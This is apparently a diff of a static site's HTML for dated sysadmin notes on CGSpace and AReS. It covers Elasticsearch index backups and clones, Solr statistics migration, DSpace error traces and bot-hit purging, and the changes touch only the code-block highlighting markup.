</span></span><span style="display:flex;"><span> at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
</span></span><span style="display:flex;"><span> at java.lang.reflect.Method.invoke(Method.java:498)
</span></span><span style="display:flex;"><span> at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
</span></span><span style="display:flex;"><span> at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
</span></span></code></pre></div><ul>
<li>That was with a JVM heap of 512m</li>
<li>I looked in Solr and found dozens of duplicates of each field again&hellip;
<ul>
@ -744,30 +744,30 @@ java.lang.OutOfMemoryError: Java heap space
<li>The AReS harvest finished this morning and I moved the Elasticsearch index manually</li>
<li>First, check the number of records in the temp index to make sure it seems complete and not with double data:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span>
{
&#34;count&#34; : 100135,
&#34;_shards&#34; : {
&#34;total&#34; : 1,
&#34;successful&#34; : 1,
&#34;skipped&#34; : 0,
&#34;failed&#34; : 0
}
}
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span> &#34;count&#34; : 100135,
</span></span><span style="display:flex;"><span> &#34;_shards&#34; : {
</span></span><span style="display:flex;"><span> &#34;total&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;successful&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;skipped&#34; : 0,
</span></span><span style="display:flex;"><span> &#34;failed&#34; : 0
</span></span><span style="display:flex;"><span> }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><ul>
<li>Then delete the old backup and clone the current items index as a backup:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-2020-12-14?pretty&#39;</span>
$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items/_settings?pretty&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2020-12-21
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-2020-12-14?pretty&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items/_settings?pretty&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2020-12-21
</span></span></code></pre></div><ul>
<li>Then delete the current items index and clone it from temp:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items?pretty&#39;</span>
$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings?pretty&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings?pretty&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: false}}&#39;</span>
</code></pre></div><h2 id="2020-12-22">2020-12-22</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items?pretty&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings?pretty&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings?pretty&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: false}}&#39;</span>
</span></span></code></pre></div><h2 id="2020-12-22">2020-12-22</h2>
<ul>
<li>I finished getting the Swagger UI integrated into the dspace-statistics-api
<ul>
@ -810,10 +810,10 @@ $ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp
</code></pre><ul>
<li>I exported the 2012 stats from the year core and imported them to the main statistics core with solr-import-export-json:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ chrt -b <span style="color:#ae81ff">0</span> ./run.sh -s http://localhost:8081/solr/statistics-2012 -a export -o statistics-2012.json -k uid
$ chrt -b <span style="color:#ae81ff">0</span> ./run.sh -s http://localhost:8081/solr/statistics -a import -o statistics-2010.json -k uid
$ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics-2012/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;*:*&lt;/query&gt;&lt;/delete&gt;&#34;</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ chrt -b <span style="color:#ae81ff">0</span> ./run.sh -s http://localhost:8081/solr/statistics-2012 -a export -o statistics-2012.json -k uid
</span></span><span style="display:flex;"><span>$ chrt -b <span style="color:#ae81ff">0</span> ./run.sh -s http://localhost:8081/solr/statistics -a import -o statistics-2010.json -k uid
</span></span><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics-2012/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;*:*&lt;/query&gt;&lt;/delete&gt;&#34;</span>
</span></span></code></pre></div><ul>
<li>I decided to do the same for the remaining 2011, 2014, 2017, and 2019 cores&hellip;</li>
</ul>
<h2 id="2020-12-29">2020-12-29</h2>
@ -824,31 +824,31 @@ $ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items/_count?q=*&amp;pretty&#39;</span>
{
&#34;count&#34; : 100135,
&#34;_shards&#34; : {
&#34;total&#34; : 1,
&#34;successful&#34; : 1,
&#34;skipped&#34; : 0,
&#34;failed&#34; : 0
}
}
$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp?pretty&#39;</span>
$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items/_settings?pretty&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2020-12-29
$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items/_settings?pretty&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: false}}&#39;</span>
</code></pre></div><h2 id="2020-12-30">2020-12-30</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items/_count?q=*&amp;pretty&#39;</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span> &#34;count&#34; : 100135,
</span></span><span style="display:flex;"><span> &#34;_shards&#34; : {
</span></span><span style="display:flex;"><span> &#34;total&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;successful&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;skipped&#34; : 0,
</span></span><span style="display:flex;"><span> &#34;failed&#34; : 0
</span></span><span style="display:flex;"><span> }
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp?pretty&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items/_settings?pretty&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2020-12-29
</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items/_settings?pretty&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: false}}&#39;</span>
</span></span></code></pre></div><h2 id="2020-12-30">2020-12-30</h2>
<ul>
<li>The indexing on AReS finished so I cloned the <code>openrxv-items-temp</code> index to <code>openrxv-items</code> and deleted the backup index:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items?pretty&#39;</span>
$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings?pretty&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings?pretty&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: false}}&#39;</span>
$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp?pretty&#39;</span>
$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-2020-12-29?pretty&#39;</span>
</code></pre></div><!-- raw HTML omitted -->
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items?pretty&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings?pretty&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings?pretty&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: false}}&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp?pretty&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-2020-12-29?pretty&#39;</span>
</span></span></code></pre></div><!-- raw HTML omitted -->

View File

@ -50,7 +50,7 @@ For example, this item has 51 views on CGSpace, but 0 on AReS
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -160,29 +160,29 @@ For example, this item has 51 views on CGSpace, but 0 on AReS
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
# start indexing in AReS
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
</span></span><span style="display:flex;"><span># start indexing in AReS
</span></span></code></pre></div><ul>
<li>Then, the next morning when it&rsquo;s done, check the results of the harvesting, backup the current <code>openrxv-items</code> index, and clone the <code>openrxv-items-temp</code> index to <code>openrxv-items</code>:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span>
{
&#34;count&#34; : 100278,
&#34;_shards&#34; : {
&#34;total&#34; : 1,
&#34;successful&#34; : 1,
&#34;skipped&#34; : 0,
&#34;failed&#34; : 0
}
}
$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-01-04
$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items&#39;</span>
$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-2021-01-04&#39;</span>
</code></pre></div><h2 id="2021-01-04">2021-01-04</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span> &#34;count&#34; : 100278,
</span></span><span style="display:flex;"><span> &#34;_shards&#34; : {
</span></span><span style="display:flex;"><span> &#34;total&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;successful&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;skipped&#34; : 0,
</span></span><span style="display:flex;"><span> &#34;failed&#34; : 0
</span></span><span style="display:flex;"><span> }
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-01-04
</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-2021-01-04&#39;</span>
</span></span></code></pre></div><h2 id="2021-01-04">2021-01-04</h2>
<ul>
<li>There is one item that appears twice in AReS: <a href="https://cgspace.cgiar.org/handle/10568/66839">10568/66839</a>
<ul>
@ -214,8 +214,8 @@ $ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-i
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./doi-to-handle.py -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -i /tmp/dois.txt -o /tmp/out.csv
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./doi-to-handle.py -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -i /tmp/dois.txt -o /tmp/out.csv
</span></span></code></pre></div><ul>
<li>Help Udana export IWMI records from AReS
<ul>
<li>He wanted me to give him CSV export permissions on CGSpace, but I told him that this requires super admin so I&rsquo;m not comfortable with it</li>
@ -261,28 +261,28 @@ $ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-i
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">2021-01-10 10:03:27,692 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=1e8fb96c-b994-4fe2-8f0c-0a98ab138be0, ObjectType=(Unknown), ObjectID=null, TimeStamp=1610269383279, dispatcher=1544803905, detail=[null], transactionID=&#34;TX35636856957739531161091194485578658698&#34;)
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>2021-01-10 10:03:27,692 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=1e8fb96c-b994-4fe2-8f0c-0a98ab138be0, ObjectType=(Unknown), ObjectID=null, TimeStamp=1610269383279, dispatcher=1544803905, detail=[null], transactionID=&#34;TX35636856957739531161091194485578658698&#34;)
</span></span></code></pre></div><ul>
<li>I filed <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=907">a bug on Atmire&rsquo;s issue tracker</a></li>
<li>Peter asked me to move the CGIAR Gender Platform community to the top level of CGSpace, but I get an error when I use the community-filiator command:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ dspace community-filiator --remove --parent<span style="color:#f92672">=</span>10568/66598 --child<span style="color:#f92672">=</span>10568/106605
Loading @mire database changes for module MQM
Changes have been processed
Exception: null
java.lang.UnsupportedOperationException
at java.util.AbstractList.remove(AbstractList.java:161)
at java.util.AbstractList$Itr.remove(AbstractList.java:374)
at java.util.AbstractCollection.remove(AbstractCollection.java:293)
at org.dspace.administer.CommunityFiliator.defiliate(CommunityFiliator.java:264)
at org.dspace.administer.CommunityFiliator.main(CommunityFiliator.java:164)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ dspace community-filiator --remove --parent<span style="color:#f92672">=</span>10568/66598 --child<span style="color:#f92672">=</span>10568/106605
</span></span><span style="display:flex;"><span>Loading @mire database changes for module MQM
</span></span><span style="display:flex;"><span>Changes have been processed
</span></span><span style="display:flex;"><span>Exception: null
</span></span><span style="display:flex;"><span>java.lang.UnsupportedOperationException
</span></span><span style="display:flex;"><span> at java.util.AbstractList.remove(AbstractList.java:161)
</span></span><span style="display:flex;"><span> at java.util.AbstractList$Itr.remove(AbstractList.java:374)
</span></span><span style="display:flex;"><span> at java.util.AbstractCollection.remove(AbstractCollection.java:293)
</span></span><span style="display:flex;"><span> at org.dspace.administer.CommunityFiliator.defiliate(CommunityFiliator.java:264)
</span></span><span style="display:flex;"><span> at org.dspace.administer.CommunityFiliator.main(CommunityFiliator.java:164)
</span></span><span style="display:flex;"><span> at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
</span></span><span style="display:flex;"><span> at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
</span></span><span style="display:flex;"><span> at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
</span></span><span style="display:flex;"><span> at java.lang.reflect.Method.invoke(Method.java:498)
</span></span><span style="display:flex;"><span> at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
</span></span><span style="display:flex;"><span> at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
</span></span></code></pre></div><ul>
<li>There is apparently <a href="https://jira.lyrasis.org/browse/DS-3914">a bug</a> in DSpace 6.x that makes community-filiator not work
<ul>
<li>There is <a href="https://github.com/DSpace/DSpace/pull/2178">a patch</a> for the as-of-yet unreleased DSpace 6.4 so I will try that</li>
@ -301,24 +301,24 @@ java.lang.UnsupportedOperationException
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
# start indexing in AReS
... after ten hours
$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span>
{
&#34;count&#34; : 100411,
&#34;_shards&#34; : {
&#34;total&#34; : 1,
&#34;successful&#34; : 1,
&#34;skipped&#34; : 0,
&#34;failed&#34; : 0
}
}
$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings?pretty&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items&#39;</span>
$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
</span></span><span style="display:flex;"><span># start indexing in AReS
</span></span><span style="display:flex;"><span>... after ten hours
</span></span><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span> &#34;count&#34; : 100411,
</span></span><span style="display:flex;"><span> &#34;_shards&#34; : {
</span></span><span style="display:flex;"><span> &#34;total&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;successful&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;skipped&#34; : 0,
</span></span><span style="display:flex;"><span> &#34;failed&#34; : 0
</span></span><span style="display:flex;"><span> }
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings?pretty&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
</span></span></code></pre></div><ul>
<li>Looking over the last month of Solr stats I see a familiar bot that <em>should</em> have been marked as a bot months ago:</li>
</ul>
<blockquote>
@ -331,9 +331,9 @@ $ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-i
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ cat log/dspace.log.2020-12-2* | grep -E <span style="color:#e6db74">&#39;session_id=[A-Z0-9]{32}:ip_addr=64.62.202.71&#39;</span> | sort | uniq | wc -l
0
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat log/dspace.log.2020-12-2* | grep -E <span style="color:#e6db74">&#39;session_id=[A-Z0-9]{32}:ip_addr=64.62.202.71&#39;</span> | sort | uniq | wc -l
</span></span><span style="display:flex;"><span>0
</span></span></code></pre></div><ul>
<li>So now I should really add it to the DSpace spider agent list so it doesn&rsquo;t create Solr hits
<ul>
<li>I added it to the &ldquo;ilri&rdquo; lists of spider agent patterns</li>
@ -341,8 +341,8 @@ $ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-i
</li>
<li>I purged the existing hits using my <code>check-spider-ip-hits.sh</code> script:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./check-spider-ip-hits.sh -d -f /tmp/ips -s http://localhost:8081/solr -s statistics -p
</code></pre></div><h2 id="2021-01-11">2021-01-11</h2>
